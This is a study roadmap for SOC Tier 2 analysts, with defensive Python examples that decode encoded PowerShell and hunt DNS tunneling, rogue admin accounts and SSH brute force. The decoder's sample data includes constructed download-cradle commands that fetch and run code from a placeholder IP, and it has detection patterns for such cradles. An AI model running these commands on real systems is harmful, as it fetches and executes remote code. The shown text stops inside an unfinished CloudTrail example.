Roadmap
SOC Analyst — Tier 2 / Threat Hunter
The investigator and hunter. Takes escalated incidents from T1 and runs deep investigations, while proactively searching for threats that bypassed automated detection entirely.
OPTIMISTIC 18 months · REALISTIC 2–3 years
Stage 00
Computer & IT Fundamentals
Everything in security builds on this base. No exceptions.
Computer Hardware
- CPU, RAM, storage types (HDD, SSD, NVMe) — roles in a system
- NIC, motherboard — how components communicate
- Physical vs virtual machines — hardware abstraction
Number Systems
- Binary (base-2) — reading and converting
- Hexadecimal (base-16) — memory addresses, file hashes, color codes
- Decimal to binary to hex conversions
- Bit, byte, kilobyte, megabyte — data size literacy
How Operating Systems Work
- Kernel vs user space — privilege separation
- Processes and threads — what they are, how the OS manages them
- Memory management — virtual memory, paging, RAM allocation
- File systems — NTFS, ext4, FAT32
- System calls — how programs communicate with the OS
- Boot process — BIOS/UEFI → bootloader → kernel → init/systemd
Software Basics
- How programs compile and execute
- Static vs dynamic libraries
- Environment variables and PATH
- Services vs applications — distinction and OS management
Virtualization
- Type 1 hypervisor (bare metal) vs Type 2 (hosted)
- VMware, VirtualBox, Proxmox, Hyper-V
- Snapshots — forensic and lab relevance
Resources
- CS50 Introduction to Computer Science (Harvard, free)
- Professor Messer CompTIA A+ (free YouTube)
- TryHackMe Pre-Security path (free)
Stage 01
Operating Systems in Depth
T2 investigations are 80% Windows. Linux runs your tools. You need both cold.
Windows
- Full directory structure — C:\Windows, C:\Users, C:\Program Files, C:\ProgramData, C:\Windows\Temp and the per-user %TEMP% (AppData\Local\Temp) and what attackers target in each
- Registry hives — HKLM, HKCU, HKCR, HKU, HKCC — attacker persistence locations: HKLM\Software\Microsoft\Windows\CurrentVersion\Run; HKCU\Software\Microsoft\Windows\CurrentVersion\Run; HKLM\System\CurrentControlSet\Services; HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (IFEO); AppInit_DLLs — DLL injection persistence
- Windows services — SCM, service accounts, unquoted service path privilege escalation
- Task Scheduler — XML structure, trigger types, action types, attacker abuse patterns
- WMI — event subscriptions (filter, consumer, binding), attacker persistence via WMI, detection in logs
- PowerShell — execution policy bypass techniques, AMSI bypass concepts, encoded commands (-enc), download cradles (IEX, Invoke-WebRequest, Net.WebClient), logging artifacts
- Windows Event Log — Security, System, Application, Sysmon, PowerShell — full structure and querying
- Critical Event IDs: 4624 — successful logon (logon type matters: 2=interactive, 3=network, 4=batch, 5=service, 10=remote interactive); 4625 — failed logon (Status/SubStatus codes give the failure reason: 0xC000006A wrong password, 0xC0000064 unknown user, 0xC0000234 locked out, 0xC0000072 disabled); 4634 — logoff; 4648 — logon with explicit credentials (runas / lateral movement indicator); 4688 — process creation (needs Audit Process Creation enabled, plus the "Include command line in process creation events" policy to get the command line); 4698/4702 — scheduled task created / updated; 4720/4722/4726 — user account created / enabled / deleted; 4732/4733 — member added to / removed from a security-enabled local group; 4740 — account lockout; 4776 — NTLM credential validation; 4768/4769/4771 — Kerberos TGT request / service ticket request / pre-auth failure; 1102 — audit log cleared (attacker covering tracks); 4719 — system audit policy changed; 7045 — new service installed (System log)
- Sysmon event IDs — full depth: EID 1 — process creation with hash and parent; EID 3 — network connection with process context; EID 7 — image/DLL loaded; EID 8 — CreateRemoteThread (process injection); EID 10 — ProcessAccess (LSASS access = credential dumping); EID 11 — FileCreate; EID 13 — registry value set; EID 22 — DNS query; EID 25 — process tampering (hollowing, herpaderping)
- PowerShell Script Block Logging (EID 4104) — deobfuscated script capture
- NTFS alternate data streams — file hiding technique, how to detect
- Volume Shadow Copies — ransomware deletion (vssadmin delete shadows), forensic recovery
- Windows memory — LSASS process, credential storage (NTLM hashes, Kerberos tickets), why it is the primary credential dumping target
- Prefetch — C:\Windows\Prefetch\, execution evidence, timestamp analysis
- Shimcache (AppCompatCache) — execution evidence in registry
- Amcache — program execution history, hash values
- MFT (Master File Table) — file system metadata, deleted file evidence
- Windows security boundaries — integrity levels (low/medium/high/system), UAC bypass techniques, token impersonation and theft
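The encoded-command and download-cradle items above are the first thing a T2 analyst decodes by hand from a 4688 or Sysmon EID 1 command line. The following is an added example (not part of the roadmap): it extracts the base64 argument behind any accepted spelling of -EncodedCommand, decodes the UTF-16LE script, and flags IEX / Net.WebClient / Invoke-WebRequest style cradles and embedded URLs. The command lines are constructed; the IP 198.51.100.7 is a documentation address, not a real indicator.

```python
"""Decode -EncodedCommand payloads from 4688 / Sysmon EID 1 command lines and
flag download-cradle indicators. Added example for this roadmap; the command
lines below are constructed, not real telemetry."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the spellings
# commonly seen in telemetry are -e, -ec, -en, -enc and the full switch.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Download/execute indicators, checked in the decoded script (or the raw command line).
CRADLE_PATTERNS = [
    ("IEX", re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)),
    ("Net.WebClient", re.compile(r"net\.webclient", re.IGNORECASE)),
    ("DownloadString/DownloadFile", re.compile(r"\.download(?:string|file)\(", re.IGNORECASE)),
    ("Invoke-WebRequest", re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b", re.IGNORECASE)),
    ("Invoke-RestMethod", re.compile(r"\b(?:irm|invoke-restmethod)\b", re.IGNORECASE)),
    ("BITS", re.compile(r"start-bitstransfer", re.IGNORECASE)),
]
URL_PATTERN = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def decode_encoded_command(b64: str):
    """Return the script behind an -EncodedCommand argument (UTF-16LE under
    base64), or None when the argument is not a valid payload."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_cradles(script: str):
    """Labels of every cradle pattern that matches the script text."""
    return [label for label, rx in CRADLE_PATTERNS if rx.search(script)]


def analyze_command_line(cmdline: str) -> dict:
    """Triage one process command line: decode -enc if present, then look for
    cradles and URLs in the decoded script (or the raw line when not encoded)."""
    match = ENCODED_ARG.search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else None
    body = decoded if decoded is not None else cmdline
    return {
        "encoded": match is not None,
        "decoded": decoded,
        "cradles": find_cradles(body),
        "urls": URL_PATTERN.findall(body),
    }


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples: one encoded cradle, one benign script run, one plain-text cradle.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc " + _encode_ps(CONSTRUCTED_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    'powershell.exe -c "iwr https://198.51.100.7/x.exe -OutFile C:\\Users\\Public\\x.exe"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print(result["encoded"], result["cradles"], result["urls"])
```

The decoder validates the base64 strictly and tolerates odd-length or non-UTF-16 payloads by returning None, so a garbled capture does not crash a bulk run over thousands of 4688 events.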
Linux
- Full filesystem hierarchy with attacker relevance — /etc, /var, /tmp, /dev/shm, /proc, /sys, /home, /root, /bin, /usr/bin, /sbin
- Investigation commands — grep, awk, sed, cut, sort, uniq, wc, diff, find, xargs, tee, strings, file, xxd
- Persistence mechanisms — cron jobs, systemd timers, rc.local, .bashrc/.profile/.bash_logout modification, SSH authorized_keys injection, SUID binary creation, LD_PRELOAD hijacking
- /proc filesystem — live process inspection without tools: /proc/[PID]/cmdline, /proc/[PID]/exe, /proc/[PID]/maps, /proc/[PID]/net/tcp
- Auditd — audit rules (auditctl), ausearch by time/key/pid, aureport summaries
- Linux capabilities — setcap, getcap, capability-based privilege escalation
- PAM (Pluggable Authentication Modules) — auth configuration, PAM backdoor technique
- Shared libraries — /etc/ld.so.conf, LD_PRELOAD hijacking for persistence
Resources
- TryHackMe Windows Fundamentals 1/2/3 (free)
- TryHackMe Linux Fundamentals 1/2/3 (free)
- OverTheWire Bandit (free)
- HTB Academy Windows Fundamentals module
- SwiftOnSecurity Sysmon config (GitHub, free)
Stage 02
Networking Fundamentals
Network forensics is a core T2 skill. Every investigation involves reconstructing traffic patterns across hosts.
OSI Model — All 7 Layers with Attack Mapping
- L2 — ARP poisoning, VLAN hopping, MAC flooding
- L3 — IP spoofing, routing attacks, ICMP tunneling
- L4 — SYN floods, port scanning patterns, TCP session hijacking
- L7 — DNS poisoning, HTTP injection, application-layer C2
TCP/IP Deep
- TCP handshake and teardown — normal vs anomalous
- TCP flags — SYN, ACK, FIN, RST, PSH, URG — reading in investigation context
- UDP — connectionless behavior, DNS/DHCP/NTP/TFTP
- ICMP — ping, traceroute, unreachable types, tunneling patterns
IP Addressing
- Subnetting, CIDR, private ranges, loopback, APIPA
- NAT impact on log source attribution in investigations
- IPv6 — link-local, global unicast, dual-stack environments
Protocols — Full Depth
- DNS, DHCP, HTTP/HTTPS/TLS, SMB, RDP, SSH, FTP, Kerberos, LDAP/LDAPS, WinRM — all from T1 coverage plus:
- NetBIOS (137/138/139) and LLMNR (5355) — name resolution poisoning attack surface
- DCOM/RPC (135 + dynamic ports) — lateral movement vehicle, WMI remote execution
- MSSQL (1433) — SQL Server auth, xp_cmdshell abuse for command execution
- NFS (2049) — network file shares, permission misconfigurations
- SNMP (161/162) — community string exposure in older environments
Common Ports — Full Reference
- 20/21 FTP | 22 SSH | 23 Telnet | 25 SMTP | 53 DNS | 67/68 DHCP | 80 HTTP | 88 Kerberos | 110 POP3 | 135 RPC/DCOM | 137-139 NetBIOS | 143 IMAP | 389 LDAP | 443 HTTPS | 445 SMB | 636 LDAPS | 1433 MSSQL | 3306 MySQL | 3389 RDP | 5355 LLMNR | 5432 PostgreSQL | 5985/5986 WinRM | 8080/8443 alt HTTP
Network Infrastructure
- Switches — MAC tables, SPAN/port mirroring setup for investigation traffic capture
- Routers, firewalls, NGFW — rule analysis during incident investigation
- IDS/IPS, proxies, DMZ, VLANs
- Network segmentation — understanding what should and should not be talking to what
Resources
- Professor Messer Network+ (free YouTube)
- TryHackMe networking modules
- Cisco Packet Tracer (free)
Stage 03
Security Fundamentals
T1 security fundamentals in full. Security+ is the baseline cert before advancing further.
Security Fundamentals
- CIA Triad, AAA, non-repudiation, threat/vulnerability/risk
- Authentication — MFA, password hashing, Pass-the-Hash, token auth, certificates
- Cryptography — symmetric, asymmetric, hashing, PKI, TLS
- Malware types — virus, worm, trojan, ransomware, rootkit, keylogger, fileless, RAT, dropper
- Attack types — phishing, brute force, credential stuffing, password spraying, DDoS, MitM, SQLi, XSS, CSRF, buffer overflow, LotL/LOLBAS, Pass-the-Hash, Kerberoasting
- Defensive controls — SIEM, EDR, XDR, SOAR, DLP, IDS/IPS, honeypots, patching
- Frameworks — NIST CSF 2.0, MITRE ATT&CK overview, Cyber Kill Chain, CIS Controls, ISO 27001, NIST 800-53, PCI-DSS, HIPAA, DoD 8570
Resources
Stage 04
Traffic Analysis & Packet Inspection
T2 investigations require packet-level analysis. Reconstruct attacks from raw PCAP. Identify advanced attacker techniques in traffic.
Wireshark — Advanced
- All T1 Wireshark skills (capture/display filters, TCP stream following, object export, IO graphs, protocol hierarchy, Statistics → Conversations)
- tshark — command-line Wireshark, scripting PCAP analysis, output to CSV/JSON
- Decrypting TLS traffic — pre-master secret log (SSLKEYLOGFILE), importing into Wireshark
- JA3/JA3S fingerprinting — TLS client/server fingerprinting, C2 tool identification
- Extracting credentials from cleartext protocols — FTP, HTTP Basic auth, Telnet
- Reconstructing file transfers from SMB, HTTP, FTP streams
- Kerberoasting in PCAP — high-volume TGS-REQ for service account SPNs
- LLMNR/NBT-NS poisoning — broadcast query and spoofed response patterns
- Pass-the-Hash — NTLM authentication with credential anomalies
Network Forensics Tools
- tcpdump — advanced BPF filtering, scripted capture, pcap replay
- NetworkMiner — automated host, credential, file extraction from PCAP
- Zeek — full log suite: conn.log, dns.log, http.log, ssl.log, files.log, kerberos.log, smb_files.log, smb_mapping.log, weird.log, notice.log (smb_cmd.log exists but is disabled by default) — pivoting across logs by uid (files.log carries conn_uids and fuid instead)
- Suricata — rule writing (action, protocol, src/dst, msg, content, pcre, sid), eve.json analysis, custom detection signatures
- Snort — rule format, pcap replay testing
- Rita (Real Intelligence Threat Analytics) — C2 beacon detection using statistical analysis on Zeek conn.log, long connection analysis, DNS baselining
- Arkime (Moloch) — full PCAP search and session visualization in web UI
- Wireshark + NetworkMiner on Malware-Traffic-Analysis.net captures
Advanced Patterns to Identify
- All T1 patterns plus: Kerberoasting — high-volume TGS-REQ targeting service account SPNs, typically with RC4 requested; AS-REP Roasting — AS-REQ for an account that does not require pre-authentication (attacker asks for RC4 so the AS-REP is crackable); DCSync — DRSUAPI replication traffic (DRSGetNCChanges) from a non-DC source IP; Pass-the-Hash — NTLM authentication from unusual source, mismatched credentials; LLMNR/NBT-NS poisoning — multicast (224.0.0.252) / broadcast name queries answered by a host that is not the DNS server, followed by NTLM authentication to that host; SMB relay — NTLM relay attack indicators in traffic; DNS tunneling — iodine/dnscat2 signatures, high subdomain entropy, byte ratio analysis, response sizes; C2 beacon analysis using Rita — low and slow connections, jitter patterns, beacon scoring; Lateral movement via WinRM — HTTP/S to port 5985/5986 between internal hosts; DCOM/RPC lateral movement — port 135 then dynamic high port connections
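The DNS tunneling indicators listed above (subdomain entropy, subdomain volume, TXT/NULL record types) are easiest to hunt in Zeek's dns.log. The following is an added example (not part of the roadmap and not Zeek's own code): it parses Zeek's TSV format using the #fields header, groups queries by registered domain, and flags domains with many distinct, long, high-entropy subdomains. The log excerpt is constructed, and the two-label "registered domain" split is a simplification that needs a public suffix list in production.

```python
"""Hunt for DNS tunneling in a Zeek dns.log: per registered domain, count unique
subdomains and measure subdomain length and Shannon entropy. Added example for
this roadmap; the log excerpt is constructed."""
import math
from collections import defaultdict


def parse_zeek_tsv(text: str):
    """Yield one dict per data row, using the #fields header for column names.
    Other '#' header lines (separator, path, types, close) are skipped."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields is None:
            raise ValueError("data row before #fields header")
        else:
            yield dict(zip(fields, line.split("\t")))


def shannon_entropy(s: str) -> float:
    """Bits per character; random base32/base64 labels score far higher than words."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(query: str):
    """Return (registered_domain, subdomain_chars). Assumption: the registered
    domain is the last two labels; multi-label suffixes (co.uk) need a public
    suffix list, which this example does not carry."""
    labels = query.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), "".join(labels[:-2])


def dns_tunnel_candidates(records, min_unique=5, min_entropy=3.5, min_len=20):
    """Score each registered domain; flag when many distinct, long, high-entropy
    subdomains were queried. The TXT/NULL ratio is reported as a supporting signal."""
    stats = defaultdict(lambda: {"subs": set(), "ent": [], "len": [], "txt_null": 0, "total": 0})
    for r in records:
        domain, sub = split_query(r["query"])
        if domain is None:
            continue
        s = stats[domain]
        s["subs"].add(sub)
        s["ent"].append(shannon_entropy(sub))
        s["len"].append(len(sub))
        s["total"] += 1
        s["txt_null"] += r.get("qtype_name") in ("TXT", "NULL")
    report = {}
    for domain, s in stats.items():
        mean_ent = sum(s["ent"]) / len(s["ent"])
        mean_len = sum(s["len"]) / len(s["len"])
        report[domain] = {
            "queries": s["total"],
            "unique_subdomains": len(s["subs"]),
            "mean_entropy": round(mean_ent, 2),
            "mean_subdomain_len": round(mean_len, 1),
            "txt_null_ratio": round(s["txt_null"] / s["total"], 2),
            "flagged": len(s["subs"]) >= min_unique and mean_ent >= min_entropy and mean_len >= min_len,
        }
    return report


def _row(*cols):
    return "\t".join(cols)


# Constructed dns.log excerpt, columns trimmed to what the hunt needs.
_TUNNEL_LABELS = [
    "q7wz3kd9pm2xfa5ht0bn8vj4gy6ecu1r",
    "m4sd8xk1vq2tz7bw5fn0gh3jc6py9ale",
    "h2kp9tb4wx7cq0zm3vn5ds8gf1ry6jue",
    "z5yc1qw8dk3mx6bt0pv9fn2hs7gj4rla",
    "b9vq4nz2kt7px0mw5cd3hs8fj1gy6rea",
    "f3gk7wq1zp5xn9vm0bt2hd6cs4jy8ral",
]
SAMPLE_DNS_LOG = "\n".join(
    ["#fields\tts\tuid\tid.orig_h\tid.resp_h\tquery\tqtype_name\trcode_name"]
    + [_row("1700000000.1", "CxA1", "10.0.0.5", "10.0.0.2", q, "A", "NOERROR")
       for q in ("www.example.com", "mail.example.com", "cdn.example.com", "login.example.com", "api.example.com")]
    + [_row(f"170000000{i}.5", f"CtN{i}", "10.0.0.5", "10.0.0.2", f"{lbl}.tun.example.net", "TXT", "NOERROR")
       for i, lbl in enumerate(_TUNNEL_LABELS)]
)

if __name__ == "__main__":
    for domain, m in dns_tunnel_candidates(parse_zeek_tsv(SAMPLE_DNS_LOG)).items():
        print(domain, m)
```

Note that example.com also reaches the unique-subdomain threshold in the sample; it is the entropy and length criteria that separate a busy legitimate zone from a tunnel, which is why all three are required before flagging.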
Resources
- TryHackMe Wireshark rooms (free)
- Malware-Traffic-Analysis.net (free real PCAPs)
- HTB Academy Network Traffic Analysis module
- Rita (github.com/activecm/rita, free)
- TryHackMe Zeek room (free)
- TryHackMe Snort room (free)
Stage 05
Log Analysis — Advanced
T2 analysts reconstruct full attacker timelines across multiple log sources simultaneously. Raw log fluency is non-negotiable.
Log Correlation Fundamentals
- Normalizing timestamps across sources — UTC, epoch, timezone offsets
- Building attacker timelines from multiple log sources — sequence reconstruction
- Pivoting technique — starting from one IOC and finding every related log entry across all sources
- Log gap analysis — identifying where attacker cleared or disabled logging
- Baselining — knowing normal before identifying abnormal at account, host, and network level
Windows Event Logs — Investigation Depth
- Logon type analysis — type 3 (network) + type 10 (remote interactive) chain indicating lateral movement
- Process creation chains — correlating 4688 events across multiple hosts by username and timeframe
- Scheduled task forensics — 4698 + task XML analysis for persistence
- Account manipulation chains — 4720 + 4732 + 4624 = account created, added to admin group, used for logon
- Sysmon investigation chains: EID 1 (process) + EID 3 (network) — process spawning C2 connection; EID 10 (ProcessAccess on lsass.exe) — credential dumping detection; EID 8 (CreateRemoteThread) — process injection detection; EID 7 (ImageLoad) — DLL hijacking / sideloading detection
- PowerShell EID 4104 — deobfuscated script block content analysis
- 1102 (log cleared) — immediate escalation trigger, begin evidence preservation
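The account manipulation chain above (4720 create, 4732 add to Administrators, 4624 first logon) together with the timestamp normalization under Log Correlation Fundamentals, as an added example that is not part of the roadmap. The events are constructed and use the Security log's EventData names in simplified form: a real 4732 carries MemberSid and a DN-style MemberName rather than the bare account name used here, and timestamps are deliberately mixed (ISO with Z, ISO with an offset, a space-separated string, and epoch seconds) to exercise the normalizer.

```python
"""Rebuild an account-manipulation chain (4720 create -> 4732 add to
Administrators -> 4624 first logon) from Windows Security events whose
timestamps arrive in mixed formats. Added example for this roadmap; the events
are constructed and the field names are simplified EventData names."""
from datetime import datetime, timedelta, timezone


def to_utc(value):
    """Normalize epoch seconds, ISO-8601 (with Z or offset) or
    'YYYY-MM-DD HH:MM:SS' (assumed UTC when no offset is given) to an aware UTC datetime."""
    if isinstance(value, (int, float)):
        return datetime.fromtimestamp(value, tz=timezone.utc)
    text = value.strip()
    if text.endswith("Z"):
        text = text[:-1] + "+00:00"
    parsed = datetime.fromisoformat(text)
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


def build_timeline(events):
    """Attach a normalized 'utc' field and sort ascending; every pivot starts here."""
    rows = [dict(e, utc=to_utc(e["TimeCreated"])) for e in events]
    rows.sort(key=lambda r: r["utc"])
    return rows


def _first(timeline, predicate):
    return next((e for e in timeline if predicate(e)), None)


def find_rogue_admin_chains(events, window_minutes=60):
    """For each 4720, look for a 4732 into Administrators naming the new account
    and then a 4624 by that account, all inside the window."""
    timeline = build_timeline(events)
    window = timedelta(minutes=window_minutes)
    chains = []
    for created in (e for e in timeline if e["EventID"] == 4720):
        account = created["TargetUserName"].lower()
        deadline = created["utc"] + window
        added = _first(timeline, lambda e: e["EventID"] == 4732
                       and e.get("MemberName", "").lower() == account
                       and e.get("TargetUserName", "").lower() == "administrators"
                       and created["utc"] <= e["utc"] <= deadline)
        if added is None:
            continue
        logon = _first(timeline, lambda e: e["EventID"] == 4624
                       and e.get("TargetUserName", "").lower() == account
                       and added["utc"] <= e["utc"] <= deadline)
        chains.append({
            "account": created["TargetUserName"],
            "created_by": created.get("SubjectUserName"),
            "host": created.get("Computer"),
            "created": created["utc"].isoformat(),
            "added_to_admins": added["utc"].isoformat(),
            "first_logon": logon["utc"].isoformat() if logon else None,
            "logon_source": logon.get("IpAddress") if logon else None,
            "logon_type": logon.get("LogonType") if logon else None,
            "complete": logon is not None,
        })
    return chains


def log_cleared_events(events):
    """1102 is an escalation trigger on its own: return them with who cleared the log."""
    return [{"host": e.get("Computer"), "by": e.get("SubjectUserName"), "at": e["utc"].isoformat()}
            for e in build_timeline(events) if e["EventID"] == 1102]


# Constructed events: a contractor account is created and never escalated, while
# svc_backup2 is created, made local admin and used within three minutes.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-03-04T09:58:11Z", "Computer": "FS01",
     "TargetUserName": "jsmith", "LogonType": 10, "IpAddress": "10.0.5.23"},
    {"EventID": 4720, "TimeCreated": "2024-03-04 10:01:40", "Computer": "FS01",
     "SubjectUserName": "jsmith", "TargetUserName": "svc_backup2"},
    {"EventID": 4732, "TimeCreated": 1709546560, "Computer": "FS01",
     "SubjectUserName": "jsmith", "MemberName": "svc_backup2", "TargetUserName": "Administrators"},
    {"EventID": 4624, "TimeCreated": "2024-03-04T11:03:05+01:00", "Computer": "FS01",
     "TargetUserName": "svc_backup2", "LogonType": 3, "IpAddress": "10.0.5.23"},
    {"EventID": 4720, "TimeCreated": "2024-03-04T10:20:00Z", "Computer": "FS01",
     "SubjectUserName": "hr_admin", "TargetUserName": "contractor7"},
    {"EventID": 1102, "TimeCreated": "2024-03-04T10:40:00Z", "Computer": "FS01",
     "SubjectUserName": "jsmith"},
]

if __name__ == "__main__":
    for chain in find_rogue_admin_chains(SAMPLE_EVENTS):
        print(chain)
    print(log_cleared_events(SAMPLE_EVENTS))
```

Every comparison is done on aware UTC datetimes, so a 4624 exported from a host in UTC+1 lands in the right place relative to a 4732 exported as epoch seconds; sorting raw strings would have put the logon after the log-clearing event.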
Active Directory Logs
- Domain controller event IDs: 4768 — Kerberos TGT request (AS-REQ) — source IP, username, encryption type, PreAuthType (0 = pre-authentication not required: AS-REP Roasting target, especially when the ticket encryption is RC4/0x17); 4769 — Kerberos service ticket request (TGS-REQ) — many distinct SPNs with RC4 (0x17) from one account in a short window = Kerberoasting; 4771 — Kerberos pre-auth failure — status 0x18 across many accounts from one source = password spray over Kerberos (these failures never show up as 4625); 4625 on DC with sub-status 0xC000006A — NTLM or interactive-logon password spray pattern; 4662 — object access on AD objects — DCSync detection (DS-Replication-Get-Changes / DS-Replication-Get-Changes-All property GUIDs requested on the domain object by a non-DC account); 4728/4732/4756 — group membership changes in privileged groups
- NTLM authentication events — 4776 with error codes
- Replication events — 4928/4929 — AD replica source naming context established / removed: the concern is an unexpected replication partner (a rogue DC); DCSync itself impersonates a DC over DRSUAPI without touching the replication topology, so it surfaces in 4662, not here
Linux Logs — Investigation Depth
- /var/log/auth.log investigation — SSH brute force chains, successful login after failures, sudo abuse
- /var/log/secure — same analysis on RHEL/CentOS
- Auditd logs — syscall auditing for file access, execution, privilege escalation
- crontab and systemd timer forensics — new entries, modified timestamps
- /proc forensics — examining running processes, deleted executables still running, network connections per PID
- bash_history gaps — deleted lines, unset HISTFILE, HISTSIZE=0 indicators
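The auth.log chain described above (failed SSH logins, a success from the same source, then sudo), as an added example that is not part of the roadmap. It parses syslog-format sshd and sudo lines, which carry no year, so the caller supplies one (an assumption), counts failures per source IP, and attaches the first accepted login inside the window plus every sudo command that user ran afterwards. The log excerpt is constructed with documentation addresses.

```python
"""Parse auth.log / secure lines and chain SSH brute force into a success and
subsequent sudo use. Added example for this roadmap; the log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RX = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+(?P<host>\S+)\s+(?P<proc>[\w./-]+)(?:\[\d+\])?:\s+(?P<msg>.*)$")
FAILED_RX = re.compile(r"^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RX = re.compile(r"^Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port \d+")
SUDO_RX = re.compile(r"^(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def parse_auth_log(text, year):
    """Syslog timestamps carry no year, so the caller supplies it (assumption).
    Returns sshd failed/accepted events and sudo invocations."""
    events = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} " + re.sub(r"\s+", " ", m["ts"]), "%Y %b %d %H:%M:%S")
        base = {"ts": ts, "host": m["host"]}
        msg = m["msg"]
        if m["proc"] == "sshd":
            f = FAILED_RX.match(msg)
            if f:
                events.append(dict(base, kind="failed", user=f["user"], ip=f["ip"]))
                continue
            a = ACCEPTED_RX.match(msg)
            if a:
                events.append(dict(base, kind="accepted", user=a["user"], ip=a["ip"], method=a["method"]))
        elif m["proc"] == "sudo":
            s = SUDO_RX.match(msg)
            if s:
                events.append(dict(base, kind="sudo", user=s["user"], target=s["target"], cmd=s["cmd"]))
    return events


def detect_ssh_brute_force(events, fail_threshold=5, window=timedelta(minutes=30)):
    """Per source IP: count failures, and if the same IP then logged in within the
    window, attach that login and every sudo command the logged-in user ran after it."""
    by_ip = defaultdict(list)
    for e in events:
        if e["kind"] in ("failed", "accepted"):
            by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in sorted(by_ip.items()):
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["kind"] == "failed"]
        if len(fails) < fail_threshold:
            continue
        first_fail = fails[0]["ts"]
        success = next((e for e in evs if e["kind"] == "accepted"
                        and first_fail < e["ts"] <= first_fail + window), None)
        finding = {
            "ip": ip,
            "failures": len(fails),
            "users_tried": sorted({e["user"] for e in fails}),
            "first_failure": first_fail.isoformat(),
            "success_user": success["user"] if success else None,
            "success_at": success["ts"].isoformat() if success else None,
            "sudo_after_success": [],
        }
        if success:
            finding["sudo_after_success"] = [
                e["cmd"] for e in events
                if e["kind"] == "sudo" and e["user"] == success["user"] and e["ts"] >= success["ts"]]
        findings.append(finding)
    return findings


# Constructed auth.log excerpt: a spray from 203.0.113.9 ends in a password login
# as 'deploy' followed by a root shell; the other lines are normal noise.
SAMPLE_AUTH_LOG = """\
Mar  4 09:55:10 web01 sshd[2100]: Accepted publickey for alice from 10.0.0.8 port 40122 ssh2: ED25519 SHA256:AbCdEf
Mar  4 10:12:01 web01 sshd[2231]: Failed password for invalid user admin from 203.0.113.9 port 51122 ssh2
Mar  4 10:12:03 web01 sshd[2233]: Failed password for root from 203.0.113.9 port 51130 ssh2
Mar  4 10:12:05 web01 sshd[2235]: Failed password for root from 203.0.113.9 port 51138 ssh2
Mar  4 10:12:09 web01 sshd[2240]: Failed password for invalid user ubuntu from 203.0.113.9 port 51150 ssh2
Mar  4 10:12:14 web01 sshd[2244]: Failed password for deploy from 203.0.113.9 port 51161 ssh2
Mar  4 10:12:20 web01 sshd[2251]: Failed password for deploy from 203.0.113.9 port 51170 ssh2
Mar  4 10:12:40 web01 sshd[2290]: Accepted password for deploy from 203.0.113.9 port 51201 ssh2
Mar  4 10:13:02 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash
Mar  4 10:30:00 web01 sshd[2400]: Failed password for bob from 10.0.0.9 port 40500 ssh2
"""

if __name__ == "__main__":
    for f in detect_ssh_brute_force(parse_auth_log(SAMPLE_AUTH_LOG, year=2024)):
        print(f)
```

The same parser runs unchanged over /var/log/secure on RHEL-family hosts; only the sudo follow-up is tied to the accepted user name, which is exactly the pivot an analyst makes by hand.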
Firewall and Proxy Logs — Correlation
- Correlating firewall denies with internal scanning activity
- Proxy logs for C2 callbacks — beacon regularity, user-agent analysis, destination reputation
- DNS logs — NXDomain spikes, DGA detection, tunneling detection
- Correlating across firewall + proxy + DNS + endpoint for full C2 chain reconstruction
Cloud Logs
- AWS CloudTrail — management events, data events, structure (eventName, userIdentity, sourceIPAddress, requestParameters); Key events: ConsoleLogin, CreateUser, AttachUserPolicy, RunInstances, GetSecretValue, ListBuckets; Anomalies: root account usage, API calls from unusual IPs, IAM privilege escalation chains
- Azure Activity Log — ARM control-plane operations: operation name, caller, resource, status; Key events: Create or update virtual machine, Delete key vault key, role assignment writes (Microsoft.Authorization/roleAssignments/write); Microsoft Entra ID audit logs — directory changes such as Add member to role, Add user, Update application; Entra ID sign-in logs — MFA bypass indicators, conditional access failures, legacy authentication
- GCP Audit Logs — data access, admin activity, system events
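The CloudTrail anomalies listed above (root account usage, API calls from unusual IPs, IAM privilege-escalation chains), as an added example that is not part of the roadmap or of any AWS tooling. The records are constructed and trimmed to the CloudTrail fields actually used; the account ID 123456789012 and the TEST-NET addresses are placeholders, and the trusted egress range is an assumption an analyst would replace with the organization's own.

```python
"""Triage constructed AWS CloudTrail records: root usage, API calls from outside
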